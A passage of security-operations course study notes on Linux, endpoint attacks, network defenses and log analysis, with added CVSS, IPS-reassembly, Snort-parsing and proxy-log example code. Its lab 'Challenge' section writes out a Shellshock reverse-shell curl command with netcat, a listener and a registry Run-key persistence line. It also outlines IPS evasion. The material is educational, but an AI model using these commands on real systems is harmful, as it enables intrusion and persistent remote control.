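        tcp) echo "$selector @@$2:$3" ;;
        *) echo "forward_rule: protocol must be udp or tcp" >&2; return 1 ;;
    esac
}

# Demo (constructed message; host is a placeholder)
decode_line '<34>Oct 14 22:14:15 host1 su: su root failed for alice on /dev/pts/0'   # auth.crit
decode_pri 13                                                                        # user.notice
forward_rule tcp '<remote host>' 10514 '*.emerg'
```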
        26. Running software on Linux
          1. 1st: structured in a format that either allows it to run on its own or run through an interpreter
          2. 2nd: execute bit set in its permission properties
          3. Source code -> (compiled with a compiler application) -> binary executable files;
          4. Compiler: GNU C compiler (gcc)
            1. Source: eg. .c extension
            2. Object files (.o): essentially libraries of compiled (binary) code
            3. Shared object files (.so)
            4. header files (.h): contains function declarations, macro definitions, constants, and system variables
          5. autotools: lets the author of the application create a series of scripts to automate the compilation and installation process
            1. decompress
            2. Scripts
              1. configure
              2. make
              3. make install
        27. Executables vs. Interpreters
          1. Executable files are binary files able to run CPU code and perform tasks independently;
          2. interpreter is an application that reads commands from a script and performs the tasks on behalf of the source file
          3. bash: (.sh) begins with #!/bin/sh
          4. Perl: (.pl); begins with #!/usr/bin/perl
          5. Python: (.py); begins with #!/usr/bin/python3
        28. Using package managers to install software in Linux
          1. Package formats
            1. Red Hat Package Management (RPM)
            2. .deb: Debian-based installations, including Ubuntu
          2. Package managers
            1. yum: primarily on Red Hat-based installations
              1. yum install <package name>
            2. apt:  Debian-based Linux installation
              1. apt-get install <package name>
        29. system applications
          1. Web by Apache
            1. /var/log/apache2/access.log
          2. Database
            1. NoSQL
              1. does not rely on strict data structures
              2. require large storage capabilities but are faster at data retrieval
            2. MySQL
              1. Error log: /var/log/mysql/mysql_error.log
              2. General query log: /var/log/mysql/mysql.log
              3. Slow queries: /var/log/mysql/mysql-slow.log
        30. Lightweight Directory Access Protocol (LDAP)
          1. protocol designed to store information about an organization; X.500 standards;
          2. DN: distinguished name for entity
          3. cn is known as the canonical name
          4. dc components are known as domain components
          5. OpenLDAP with slapd; log /var/log/slapd
        31. Explore the Linux OS
          1. Shell – command processor
          2. to see the current alias definitions, enter the command alias
          3. files whose names begin with . are hidden by default;
          4. cd ~ for home directory;
          5. echo $PATH
            1. $PATH will direct the system to look in these five directories for any entered command
          6. which ls: where the system will find the executable command
          7. ls file?-2 / ls file*2
          8. rm testdir/* OR rm -r testdir
          9. groups
          10. cd ~tom
          11. With sudo group, user could elevate themselves to a super user with the sudo -i command
          12. variable with $, eg. $USER
          13. piping with cat (> / >>), |, less, more
          14. Word count: wc auth.log
          15. grep auth.log
          16. ps u: includes all processes that are launched by the current user
            1. ps u --forest: display in parent-child format
            2. ps aux --forest | grep apache
          17. netstat
            1. netstat -ten
            2. netstat -tul: all the TCP ports and UDP ports
            3. netstat -rn: displays routing table
        32. Challenge
      10. Understanding Common Endpoint Attacks
        1. Classify attacks, exploits, and vulnerabilities
          1. Clients:
            1. do not receive the same amount of attention as servers
            2. susceptible to social engineering attack
          2. vulnerability: a flaw or weakness
          3. exploits: method of leveraging a vulnerability to do harm;
            1. local exploits: access and lead to privilege escalation;
            2. remote exploits: over the network without any prior access
          4. attack: attempt to exploit a vulnerability
          5. CVSS (Common Vulnerability Scoring System v3.0)
            1. qualitative representation
            2. 8 metrics
              1. Attack vector: Network / Adjacent / Local / Physical;
              2. Attack complexity: Low / High
              3. Privileges Required: None / Low / High
              4. User Interaction: None / Required
              5. Scope: Unchanged / Changed
              6. Confidentiality: None / Low / High
              7. Integrity: None / Low / High
              8. Availability: None / Low / High
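Added example (not from the course or these notes): a CVSS v3.0 base-score calculator built from the eight metrics above, following the published v3.0 formulas (Impact, Exploitability, Scope handling and Roundup); the vectors in the demo are constructed.

```shell
#!/bin/sh
# Added example, not from the course notes: CVSS v3.0 base score from
# the eight metrics, using the formulas of the FIRST CVSS v3.0 spec.
# Metric values are the letters used in a vector string, in the order
# AV AC PR UI S C I A.

# cvss3_base N L N N U H H H -> 9.8   (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
cvss3_base() {
    [ $# -eq 8 ] || { echo "usage: cvss3_base AV AC PR UI S C I A" >&2; return 1; }
    awk -v av="$1" -v ac="$2" -v pr="$3" -v ui="$4" -v s="$5" -v c="$6" -v i="$7" -v a="$8" '
    function cia(v) { return v == "H" ? 0.56 : v == "L" ? 0.22 : 0 }
    function min(x, y) { return x < y ? x : y }
    # CVSS Roundup: smallest value with one decimal place that is >= x,
    # done on an integer copy so float noise cannot push 5.60000 to 5.7
    function roundup(x,    n) {
        n = int(x * 100000 + 0.5)
        if (n % 10000 == 0) return n / 100000
        return (int(n / 10000) + 1) / 10
    }
    BEGIN {
        avw["N"] = 0.85; avw["A"] = 0.62; avw["L"] = 0.55; avw["P"] = 0.20
        acw["L"] = 0.77; acw["H"] = 0.44
        uiw["N"] = 0.85; uiw["R"] = 0.62
        # Privileges Required weighs more when Scope is Changed
        prw["N"] = 0.85
        prw["L"] = (s == "C") ? 0.68 : 0.62
        prw["H"] = (s == "C") ? 0.50 : 0.27
        if (!(av in avw) || !(ac in acw) || !(pr in prw) || !(ui in uiw) ||
            (s != "U" && s != "C") || c !~ /^[HLN]$/ || i !~ /^[HLN]$/ || a !~ /^[HLN]$/) {
            print "cvss3_base: bad metric value" > "/dev/stderr"
            exit 1
        }
        iss = 1 - (1 - cia(c)) * (1 - cia(i)) * (1 - cia(a))
        if (s == "C") impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ^ 15
        else          impact = 6.42 * iss
        expl = 8.22 * avw[av] * acw[ac] * prw[pr] * uiw[ui]
        if (impact <= 0)   score = 0
        else if (s == "C") score = roundup(min(1.08 * (impact + expl), 10))
        else               score = roundup(min(impact + expl, 10))
        printf "%.1f\n", score
    }'
}

# cvss3_rating 9.8 -> Critical   (the qualitative severity bands)
cvss3_rating() {
    awk -v s="$1" 'BEGIN {
        if (s == 0)      print "None"
        else if (s < 4)  print "Low"
        else if (s < 7)  print "Medium"
        else if (s < 9)  print "High"
        else             print "Critical"
    }'
}

# Demo: remote unauthenticated RCE, local privilege escalation, and a
# reflected-XSS style Scope:Changed case (vectors constructed for the demo)
for v in "N L N N U H H H" "L L L N U H H H" "N L N R C L L N"; do
    score=$(cvss3_base $v)   # $v unquoted on purpose: split into 8 words
    echo "$v -> $score ($(cvss3_rating "$score"))"
done
```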
        2. Buffer overflow (client side attacks)
          1. service accepts input expected to fall within a certain size but does not verify the size of the input on reception;
          2. input > write to memory, filling up the associated buffer and also overwriting adjacent memory > may corrupt the system and cause it to crash;
            1. Results: Corruption of data / Crash of App / Execution of malicious code;
        3. Malware
          1. Common types:
            1. Viruses: propagate by inserting a copy of themselves into a program; need human help, such as USB devices, to spread;
            2. Worms: standalone software that does not require a host program to self-replicate functional copies; trick others into executing them;
            3. Trojan horses: hidden malicious functionality or backdoor within an existing program
          2. APTs (Advanced Persistent Threats)
            1. set of continuous hacking processes
            2. 6 Stages
              1. Initial Compromise
              2. Escalation of privileges
              3. Internal reconnaissance
              4. Lateral propagation, compromise other systems on track towards goal
              5. The end goal of the attacker, for example, may be to exfiltrate sensitive data
              6. Mission complete
        4. Reconnaissance
          1. attempt to gather information of target before intrusive attack;
            1. eg. dig, nslookup, and whois;
            2. list of hosts and port scan
          2. Vulnerability scanners, eg. Nessus and OpenVAS;
        5. Gaining Access and Control
          1. techniques
            1. phishing
            2. brute force
            3. password spraying: try one or two common passwords, staying below the lockout threshold;
              1. enforcing strong password
            4. botnet
              1. infects computers by sending them malicious bots, which are self-propagating malware;
              2. a bot can log keystrokes, gather passwords, capture and analyze packets, gather financial information, launch DoS attacks, relay spam, and open back doors;
              3. the attacker uses a Command-and-Control server to control the botnet;
        6. Gaining Access Via Social Engineering
        7. Social Engineering Example: Phishing
          1. Spear phishing: target to smaller groups;
          2. Whaling: increasing profiling to top executives;
          3. Pharming: inject / compromising name services;
          4. Watering hole: Only members of the target group are attacked; compromised web server to target select groups;
          5. Vishing: uses voice and the phone system as its medium instead of email;
          6. Smishing: uses SMS texting as the medium;
        8. Gain access via web-based attacks
          1. client-side web-based attacks involve manipulating the URI
          2. URI
            1. Scheme: protocol
            2. Authority: name of server
            3. Path
            4. Query
            5. Fragment: follows a number (or pound) sign (#)
          3. Attacks
            1. Executing remote scripts: uses ascii encoded characters rather than standard characters;
              1. a PHP script hosted on the victim’s server that allows external scripts to be referenced and executed;
            2. Upload undesired files: by using .. (directory traversal) in the path
            3. XSS (Cross site scripting) attacks
        9. Exploit kits
          1. automated framework, to discover and exploit vulnerabilities in an endpoint, infect it with malware, and execute malicious code;
          2. shadow domain: a second-level domain that is registered by a malicious person using compromised domain registration information from a legitimate site
          3. eg. Angler exploit kit was one of the largest and most effective
        10. rootkits
          1. Goal:  completely hide the activities of the attacker on the local system;
          2.  by very sophisticated attackers
          3. Identifying and reverse-engineering the rootkit could identify its presence
          4. keep software updated and anti-malware;
        11. privilege escalation
          1. password stores / guessing;
          2. password interception
          3. pass-the-hash tool
          4. memory extraction
          5. “privilege escalation attack” by high level ones
          6. Prevention: Strong password & Password Change;
        12. pivoting
          1. tunnel the network connections to compromised network
          2. simplified VPN tunnel
        13. post-exploitation tools example
          1. PowerShell is typically whitelisted and its malicious scripts are often not caught by anti-virus software
          2. Metasploit is a common penetration testing software tool.
            1. Metasploit has included Mimikatz, a post-exploitation tool to gather credential data from Windows systems;
        14. exploit kit example: Angler exploit kit chain of activities
          1. browses to a compromised legitimate web site
          2. web site contains a malicious obfuscated script (or iFrame) to redirect the victim to the rapidly changing Angler landing page
          3. The Angler exploit kit scans the victim’s machine for software vulnerabilities and then delivers an exploit
          4. After compromising the victim's host, the actual malware payload (for example, Cryptowall) is delivered
          5. Malware CnC traffic occurs between the victim’s machine and the threat actor’s CnC servers
        15. explore endpoint attacks
        16. Challenge
          1. rlogin and the .rhost + + misconfiguration;
          2. Upload attacker’s public key to remote host by NFS share session, Then connecting by SSH;
          3. Exploit an Operating System Flaw
            1. Shell Shock;
            2. inject the secret string () { :; };
            3. Reverse shell connection: from host to attacker when firewall blocks inbound connection;
              1. nc: netcat
              2. nc -lvp 9876
              3. curl -k -H 'X: () { :;}; /bin/bash -c "nc -e /bin/bash 9876"'
          4. Pivot
            1. using an instance (also referred to as a “foothold”) to “move” around the network
          5. Employ social engineering / phishing
            1. malicious attachment that launch a reverse TCP connection back;
          6. Persistence
            1.  update the Inside Windows host registry setting so that the reverse connection launches whenever;
            2. remotely launch shell or CMD in host by meterpreter;
            3. maintain persistency:
              1. hacking the basic input/output system (BIOS), hacking the boot sectors of a hard drive, using Windows log on scripts, and using the Windows Task Scheduler;
              2. REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "My App" /t REG_SZ /F /D "C:\Logs\x.exe"
          7. Tunnel Exfiltrated Data
            1. Motives
              1. Few protocols are allowed: HTTP,  HTTPS, DNS, or ICMP and IRC;
              2. Less conspicuous protocol may also be the objective
              3. For example, tunneled using ICMP echo request and echo reply packets; (by ptunnel)
            2. Tunnel SSH traffic inside ICMP tunnel
      11. Understanding Network Security Technologies
        1. Defense-in-depth strategy
          1. layered approach to security
          2. providing redundant controls at multiple levels to mitigate risk
        2. defend across the attack continuum
          1. three phases: before, during, and after;
            1. Device inventory (What?)
            2. Access controls, enforce policy, and block applications and overall access to assets
          2. BEFORE: control, enforce, harden;
          3. DURING: detect, block, defend;
          4. AFTER: scope, contain, remediate;
        3. Authentication, Authorization, and Accounting
          1. Authentication: identifying users, including login and password dialog;
          2. Authorization: actions allowed once authenticated;
          3. Accounting: track what identities have done;
          4. local AAA db -> Scalability issues;
          5. AAA protocols
            1. RADIUS (Remote Authentication Dial-In User Service)
              1. uses UDP ports (1812-1813 or 1645-1646)
              2. authentication and authorization
            2. TACACS+ (Terminal Access Controller Access Control System Plus)
              1. TCP port 49
              2. separates authentication, authorization, and accounting
              3. encrypts the entire packet body
        4. Identity and Access Management
          1. User, User Class, Device, Posture (compliance status, eg. antivirus / patches)
        5. Stateful Firewall
          1. firewall connection’s state table, inspects and allows or blocks traffic based on the connection state, port, and protocol;
          2. Routed mode: routing ability
          3. Transparent mode: layer 2 “bump in the wire” firewall with no routing ability
        6. Network Taps
          1. device that allows security analysts to capture traffic on an already overloaded or congested link between two network devices;
            1. must physically be inserted;
            2. interruption of the link at installation;
            3. rack-mounted space;
            4. connections increase, number of taps increase;
            5. Benefits: no congestion or degrade performance across the link;
            6. Fail-safe means that if hardware fails or power is lost, the connection between the two devices is not affected
        7. Switched Port Analyzer (SPAN)
          1. SPAN feature / port mirroring;
          2. SPAN consumes resources, thus, select wanted traffic only:
            1. doubles traffic internally;
            2. adds to the traffic being processed by the switch fabric;
            3. doubles forwarding engine load;
          3. Steps: Define the source port or VLAN, then select the destination port
        8. Remote Switched Port Analyzer (RSPAN)
          1. flooded into a special RSPAN VLAN,  destination port can then be located anywhere in the VLAN;
          2. Config.:
            1. Trunks are required
            2. destination port of source switch is RSPAN VLAN; while source port at destination switch is RSPAN VLAN;
            3. Thus, RSPAN cannot monitor BPDUs
          3. Drawback
            1. network performance degradation
        9. Intrusion Prevention System
          1. IDS produces alert while IPS can respond immediately, and prevent possible malicious traffic from passing;
          2. Strategies
            1. Anomaly detection: learns what is normal from a traffic baseline and alerts on deviations;
            2. Rule-based detection: database of IPS rules / signatures
            3. Reputation-based: allow / block all traffic from known bad sources
        10. IPS Evasion Techniques: attempt to bypass the intrusion detection and traffic filtering functions;
          1. Traffic Fragmentation
            1. fragment IP traffic in a manner that is not uniquely interpreted;
            2. overwrite a portion of a previous TCP segment in a stream with new data in a subsequent TCP segment
            3. the offset values in the IP header do not match up as they should -> overlapping fragments -> IPS sensor may not know how the target system will reassemble;
          2. Traffic Substitution and Insertion
            1. substituting the payload data with other data in a different format but with the same meaning, eg.
              1. Using unicode representation instead of characters inside HTTP requests
              2. Exploiting case sensitivity and changing case of characters in a malicious payload
              3. Substitution of spaces with tabs, and vice versa
              4. Insertion: sends a malicious sequence byte-by-byte and inserts extra bytes of data within the malicious sequence;
          3. Encryption and Tunneling
            1. Tunneling traffic inside DNS / HTTP;
          4. Protocol-Level Misinterpretation
            1. make the IPS sensor ignore or misread traffic by causing it to misinterpret the end-to-end meaning of network protocols, so it sees the traffic differently from the target;
            2. intentionally corrupt the TCP checksum of specific packets: the target host discards them, but a sensor that does not verify checksums still processes them;
            3. manipulate the endian format of data in the packet in an attempt to make the IPS sensor misinterpret the meaning of the data;
          5. Resource Exhaustion
            1. keep the IPS sensor busy by sending lots of fake traffic (noise) so that real attack traffic is missed;
          6. Timing Attacks
            1. performing their actions slower than normal, not exceeding the thresholds inside the time windows that the signatures use to correlate different packets together;
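The fragmentation, insertion and checksum tricks from the evasion list above, as an added example (not course material): a byte-level stream reassembler that can follow either a "first data wins" or "last data wins" overlap policy and can either honour or ignore the TCP checksum, so you can compare what a sensor matches against what the target actually reassembles. The segments, the decoy bytes and the signature string are constructed for the example.

```python
# Added example (not from the course): how overlapping TCP segments and
# bad-checksum packets make a sensor see a different byte stream than the
# target host. Segments, policies and the signature are constructed.

def reassemble(segments, policy="first", verify_checksum=True):
    """Rebuild a stream from (offset, data, checksum_ok) segments in arrival order.

    policy='first': bytes already received win on overlap (original data kept).
    policy='last' : later bytes overwrite earlier ones on overlap.
    verify_checksum=True drops segments with a bad checksum, as a real host would.
    """
    if policy not in ("first", "last"):
        raise ValueError("policy must be 'first' or 'last'")
    stream = {}
    for offset, data, checksum_ok in segments:
        if verify_checksum and not checksum_ok:
            continue
        for i, byte in enumerate(data):
            pos = offset + i
            if policy == "last" or pos not in stream:
                stream[pos] = byte
    if not stream:
        return b""
    end = max(stream) + 1
    missing = [pos for pos in range(end) if pos not in stream]
    if missing:
        raise ValueError(f"gap in stream at offsets {missing[:5]}")
    return bytes(stream[pos] for pos in range(end))


def sensor_vs_target(segments, signature, sensor_policy, target_policy,
                     sensor_verifies_checksum):
    """Compare what an IPS sensor matches against what the target reassembles."""
    seen_by_sensor = reassemble(segments, sensor_policy, sensor_verifies_checksum)
    seen_by_target = reassemble(segments, target_policy, verify_checksum=True)
    return {
        "sensor_alerts": signature in seen_by_sensor,
        "target_hit": signature in seen_by_target,
        "evaded": signature in seen_by_target and signature not in seen_by_sensor,
    }


SIGNATURE = b"/etc/passwd"   # constructed signature string

# Constructed overlap attack: two segments claim offset 9; one is a decoy.
OVERLAP = [
    (0,  b"GET /etc/",      True),
    (9,  b"public",         True),   # decoy, arrives first
    (9,  b"passwd",         True),   # real payload, same offset
    (15, b" HTTP/1.0\r\n",  True),
]

# Constructed insertion attack: the decoy carries a deliberately bad TCP
# checksum, so the target silently drops it but a lazy sensor accepts it.
INSERTION = [
    (0,  b"GET /etc/",      True),
    (9,  b"public",         False),  # bad checksum: target never sees it
    (9,  b"passwd",         True),
    (15, b" HTTP/1.0\r\n",  True),
]

if __name__ == "__main__":
    print(reassemble(OVERLAP, "first"))
    print(reassemble(OVERLAP, "last"))
    print(sensor_vs_target(OVERLAP, SIGNATURE, "first", "last", True))
    print(sensor_vs_target(INSERTION, SIGNATURE, "first", "first", False))
```

The practical lesson is in `sensor_vs_target`: the sensor is only safe when it reassembles exactly the way the target host does (same overlap policy, same checksum handling), which is why production IPS engines let you configure the target's reassembly policy per host group.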
        11. Snort Rules
          1. real-time traffic analysis and packet logging
          2. the core is the detection engine, fed by preprocessors (protocol normalisation) and the rule base (IPS signatures);
          3. Rules
            1. the rule header and the rule body;
            2. rule header: rule action, protocol, source and destination IP addresses, and source and destination port info.;
            3. content option in body: set rules that search for specific content
              1. Rules with multiple content statements are treated as an AND operation;
            4. msg option supplies the text that the logging and alerting engine writes when the rule fires;
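The rule header / rule body split and the AND semantics of multiple content options, as an added example (not Snort's own code): a minimal parser for the rule syntax described above plus a matcher, run against constructed HTTP payloads. The rules use the local SID range (1000000 and up) and are made up for the example; IP variables such as $HOME_NET are parsed but not evaluated.

```python
# Added example (not Snort's own code): a minimal parser for the Snort rule
# format described above, with a matcher that applies the AND semantics of
# multiple content options. Rules, SIDs and payloads are constructed.
import re

HEADER_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<direction>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<options>.*)\)\s*$",
    re.S,
)
# Split on ';' only when an even number of double quotes follows (i.e. outside quotes).
OPTION_SPLIT_RE = re.compile(r';(?=(?:[^"]*"[^"]*")*[^"]*$)')


def decode_content(text):
    """Turn a content string into bytes; |..| sections hold hex, e.g. "abc|00 01|"."""
    out = bytearray()
    for i, part in enumerate(text.split("|")):
        if i % 2 == 1:                      # inside |...|: hex bytes
            out.extend(bytes.fromhex(part))
        else:
            out.extend(part.encode("latin-1"))
    return bytes(out)


def parse_rule(text):
    """Parse one rule into {'header': {...}, 'msg': str, 'sid': int, 'contents': [...]}."""
    m = HEADER_RE.match(text.strip())
    if not m:
        raise ValueError("not a rule: " + text)
    rule = {"header": {k: m.group(k) for k in
                       ("action", "proto", "src", "sport", "direction", "dst", "dport")},
            "msg": None, "sid": None, "contents": []}
    for opt in OPTION_SPLIT_RE.split(m.group("options")):
        opt = opt.strip()
        if not opt:
            continue
        name, _, value = opt.partition(":")
        name, value = name.strip(), value.strip().strip('"')
        if name == "content":
            rule["contents"].append({"pattern": decode_content(value), "nocase": False})
        elif name == "nocase":
            rule["contents"][-1]["nocase"] = True   # modifies the preceding content
        elif name == "msg":
            rule["msg"] = value
        elif name == "sid":
            rule["sid"] = int(value)
    return rule


def port_matches(spec, port):
    return spec == "any" or spec == str(port)


def matches(rule, proto, dport, payload):
    """True only if header fields fit and EVERY content option is found (AND)."""
    h = rule["header"]
    if h["proto"] != proto or not port_matches(h["dport"], dport):
        return False
    for c in rule["contents"]:
        if c["nocase"]:
            if c["pattern"].lower() not in payload.lower():
                return False
        elif c["pattern"] not in payload:
            return False
    return True


# Constructed rules in the local-rule SID range (1000000+), not real Snort signatures.
RULES = [parse_rule(r) for r in [
    'alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"cmd.exe requested under /scripts/"; '
    'content:"/scripts/"; content:"cmd.exe"; nocase; sid:1000001; rev:1;)',
    'alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"cmd.exe, case-sensitive"; '
    'content:"/scripts/"; content:"cmd.exe"; sid:1000002; rev:1;)',
    'alert tcp any any -> $HOME_NET any (msg:"NOP sled"; content:"|90 90 90 90|"; sid:1000003; rev:1;)',
]]


def alerts_for(proto, dport, payload):
    """Return the msg of every rule that fires on this packet."""
    return [r["msg"] for r in RULES if matches(r, proto, dport, payload)]


if __name__ == "__main__":
    for p in (b"GET /scripts/../../cmd.exe?/c+dir HTTP/1.0\r\n",
              b"GET /scripts/../../CMD.EXE?/c+dir HTTP/1.0\r\n",
              b"GET /index.html HTTP/1.0\r\n"):
        print(p, "->", alerts_for("tcp", 80, p))
```

The second constructed payload ties back to the substitution evasion noted earlier: with the request written as CMD.EXE, only the rule carrying `nocase` fires, so the case-sensitive rule is evaded by a trivial change of case.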
        12. VPNs: provides Confidentiality, Origin authentication, Data Integrity;
          1. Deployment mode: Site-to-site VPN and remote-access VPN;
          2. Underlying technology: IPsec VPN, SSL VPN, MPLS VPN, other Layer 2 technologies;
          3. Encryption
            1. Link encryption: entire frame is encrypted between two devices;
            2. Packet payload encryption: Only the packet payload is encrypted, thus, could be routed at Layer 3 network;
        13. Email Content Security
          1. Threat prevention with reputation filters: use online reputation service databases to identify bad senders;
          2. Policy enforcement with message filters:
          3. Spam detection: Email reputation (Who), Message content (Which), Message structure (How), Web reputation (Where);
          4. Virus detection
          5. Advanced malware protection
          6. Content filters
          7. Outbreak filters: protection against zero-day outbreaks; messages whose attachments share the characteristics of an emerging infected file are held back until signatures catch up;
          8. DLP scanning for outgoing mail to prevent data leakage;
        14. Web Content Security
          1. Web content security systems act as a web proxy for the HTTP and the HTTPS traffic;
          2. address the pervasive threat of users accessing malicious web sites and their content;
          3. transparent proxy deployment
          4. explicit proxy deployment (client-web browser must be statically set to use the HTTP proxy specifically)
        15. DNS Security
          1. monitoring DNS queries and DNS servers is a critical step in identifying and containing malware infections and investigating attacks;
          2. malware uses DNS to reach its CnC infrastructure or to exfiltrate data (eg. tunnelled inside query names);
        16. Network Based Malware Protection
          1. takes action on files that are traversing the network;
          2. disposition from Cisco cloud analysis: clean / malware / unknown;
            1. includes a sandbox test environment;
            2. files are fingerprinted by their SHA-256 hash;
            3. trajectory maps how the file is transferred between hosts
        17. Next Generation Firewall
          1. application visibility and control, advanced malware protection, URL filtering, SSL/TLS decryption, and next-generation intrusion prevention systems
          2. NGFWs (over standard firewall) perform various security functions, such as generating different types of logs and alerts related to suspicious activities, to protect the network from advanced attacks;
        18. Security Intelligence
          1. Gartner’s definition: evidence-based knowledge, including context, mechanisms, indicators, implications and actionable advice, about an existing or emerging menace or hazard to assets that can be used to inform decisions regarding the subject’s response to that menace or hazard
          2. Cloud-based services provide automatic updates that include dynamic lists of known CnC servers, dangerous URIs, or lists of known malicious hosts. eg. Talos Intelligence;
          3. built into today's next-generation firewalls
        19. Threat Analytic Systems
          1. Signatures with updated IP/domain blacklists and anti-virus signatures
          2. helps the security analyst identify generic security breaches from malware without known signatures
          3. detection with automatic behavior-based machine learning
        20. Network Security Device Form Factors
          1. Device implementation: physical, virtual, or cloud-based
          2. Data within the cloud is not natively secure, and customer data breaches are a major concern to enterprises
        21. Security Onion Overview (distribution of Linux)
          1. Ubuntu Linux OS and contains several useful security tools
            1. Full packet capture
            2. Network-based and host-based intrusion detection sensors
            3. Security analysis tools
            4. Deployment models
              1. Standalone
              2. Server-sensor: bulk of the collected data on the sensors until requested by the analyst’s client
              3. Hybrid
        22. Security Tools Reference by security analyst
          1. ***
        23. Explore Network Security Technologies
          1. TCP three-way handshake: SYN > SYN-ACK > ACK; an ACK with no matching connection is answered with RST;
          2. ICMP: ECHO request > ECHO reply;
        24. Challenge
          1. A blind spot is the failure to properly monitor DNS activity for security purposes
          2.  Cisco CTA dashboard‘s  “relative threat exposure”: How is my organization doing as it relates to others
      12. Understanding Endpoint Security Technologies
        1. Host-based Personal Firewall
        2. Host-based Anti-virus
        3. Host-based Intrusion Prevention System
        4. Application Whitelists and Blacklists
        5. Host-based Malware Protection
        6. Sandboxing
        7. File Integrity Checking
        8. Explore Endpoint Security
        9. Challenge
      13. Describing Security Data Collection
        1. Network Security Monitoring Placement
          1. outside (before) the firewall: sees every attack attempt, including new forms the firewall would block, but at the cost of much higher volume and overhead;
        2. Network Security Monitoring Data Types
          1. Session Data
            1. transport protocol, source IP address, source port, destination IP address, destination port and time stamp;
          2. Full packet capture
            1. records every byte transferred, at the cost of large storage requirements; the common file type is PCAP;
          3. Transaction data
            1. log files contain transaction data, eg. SMTP, HTTP…
          4. Extracted content
            1. Objects that are mined from network traffic are considered extracted content
          5. statistical data
            1. describes network activity at a higher level (counts, rates, top talkers) rather than per packet or per session;
          6. alert data
            1. produced by IDS or IPS
            2. could be False positive and false negatives;
          7. Syslog
            1. forward to syslog server
            2. eight syslog severity levels. Levels 0 through 7. Emergency, Alert, Critical, Error, Warning, Notice, Informational, Debug;
          8. Indicator of Compromise
            1. a data point extracted from security data that serves as a high-fidelity indicator of intrusion, eg. a known-bad external IP address, unexpected changes in the registry;
              1. OpenIOC is an extensible XML schema that enables security professionals to describe the technical characteristics that identify a known threat
          9. Network Time Protocol
            1. UDP 123;
        3. Intrusion Prevention System Alerts
          1. complementing other network security devices such as firewalls
          2. filter out false alerts
          3. correlate IPS alerts with other data, such as the firewall logs, DNS logs, web security logs, email logs, AAA server logs, applications logs, NetFlow records, and PCAPs traffic analysis
        4. True / False, Positive / Negative IPS Alerts
          1. True positive: A security control acted when malicious activity took place;
          2. True negative: A security control did not act, because there was no malicious activity;
          3. False positive: A security control acted when malicious activity did not take place; too tight controls;
          4. False negative: A security control did not act when malicious activity took place; too relaxed proactive controls
          5. Balanced practices:
            1. IDS (alert only): tuned more sensitive, at the cost of more false positives;
            2. IPS (inline): tuned less sensitive so that legitimate traffic is not blocked;
        5. IPS Alerts Analysis Process
          1. Goals: blocking attacks and identifying attacks;
          2. Questions
            1. Is this event a security threat?
            2. Is this information useful?
        6. Firewall Log
          1. firewall logs should be used together with other forms of network security monitoring;
          2. generally a small subset of log messages will initially provide the most benefit
        7. DNS Log
        8. Web Proxy Log
          1. malware commonly uses HTTP/HTTPS for its CnC communication, so proxy logs are a key data source;
          2. should decrypt SSL/TLS traffic so that it can be inspected, eg.
            1. many POST commands going to an unknown site with a bad reputation, then data exfiltration may be assumed;
            2. GET commands to a suspicious website with a bad reputation containing .exe files could be a sign of droppers;
          3. “epoch time” format needs epoch converters;
          4. recognize some of the common HTTP request methods and status code
            1. URL redirection.
            2. Successful Transactions status codes
              1. 200 for OK
              2. 201 for Created
              3. 202 for Accepted
            3. Redirected Transactions status codes
              1. 301 for Moved permanently
              2. 302 for Moved temporarily
              3. 304 for Not modified
            4. Client-side errors status codes
              1. 400 for Bad request
              2. 401 for Unauthorized
              3. 403 for Forbidden
              4. 404 for Not found
            5. Server-side errors status codes
              1. 500 for Internal server error
              2. 501 for Not implemented
              3. 502 for Bad gateway
              4. 503 for Service unavailable
            6. HTTP request methods
              1. GET for Retrieval and simple searches
              2. POST for Submit data-query
              3. PUT for Upload data-files
              4. HEAD for Metadata retrieval
              5. DELETE for Remove resource
              6. TRACE for Application-layer loopback (the server echoes back the request it received)
              7. OPTIONS for Request available methods
              8. CONNECT for Tunnel through the proxy (used for HTTPS)
              9. PROPFIND for Retrieve properties of an object (WebDAV)
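The proxy-log heuristics above (repeated POSTs to a bad-reputation site, .exe downloads from one), the epoch-time conversion and the status-code classes, as an added example (not course material): detection logic run over constructed Squid-style access.log lines. The reputation list, the POST threshold and every log line are made up for the example.

```python
# Added example (not from the course): detection logic over constructed Squid
# style access.log lines, applying the two heuristics above (POST floods to a
# bad-reputation site, .exe downloads from one) and converting epoch timestamps.
# The reputation list, thresholds and log lines are all made up for this example.
from collections import Counter, defaultdict
from datetime import datetime, timezone
from urllib.parse import urlparse

# Constructed log in Squid native format:
# time.ms elapsed client action/status bytes method URL user hierarchy/peer mime
LOG = """\
1507968000.101    120 10.0.0.5 TCP_MISS/200 5120 POST http://badsite.example/u/1 - HIER_DIRECT/203.0.113.9 application/octet-stream
1507968001.202    118 10.0.0.5 TCP_MISS/200 5120 POST http://badsite.example/u/2 - HIER_DIRECT/203.0.113.9 application/octet-stream
1507968002.303    115 10.0.0.5 TCP_MISS/200 5120 POST http://badsite.example/u/3 - HIER_DIRECT/203.0.113.9 application/octet-stream
1507968003.404    119 10.0.0.5 TCP_MISS/200 5120 POST http://badsite.example/u/4 - HIER_DIRECT/203.0.113.9 application/octet-stream
1507968010.000     40 10.0.0.7 TCP_MISS/302 410 GET http://ads.example/click?id=9 - HIER_DIRECT/198.51.100.2 text/html
1507968010.050     90 10.0.0.7 TCP_MISS/200 81920 GET http://badsite.example/dl/update.exe - HIER_DIRECT/203.0.113.9 application/x-msdownload
1507968020.000     30 10.0.0.9 TCP_HIT/200 2300 GET http://intranet.example/index.html - HIER_NONE/- text/html
1507968021.000     25 10.0.0.9 TCP_MISS/404 300 GET http://intranet.example/missing - HIER_DIRECT/10.1.1.1 text/html
"""

BAD_REPUTATION = {"badsite.example"}   # constructed stand-in for a reputation feed
POST_THRESHOLD = 3                     # constructed tuning value


def to_utc(epoch_seconds):
    """Convert a proxy 'epoch time' field to an ISO 8601 UTC string."""
    return datetime.fromtimestamp(float(epoch_seconds), tz=timezone.utc).isoformat()


def parse_line(line):
    f = line.split()
    if len(f) < 10:
        raise ValueError("short line: " + line)
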